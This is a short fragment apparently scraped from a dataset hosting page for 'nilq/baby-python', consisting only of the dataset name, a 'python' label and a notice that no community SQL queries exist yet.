nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.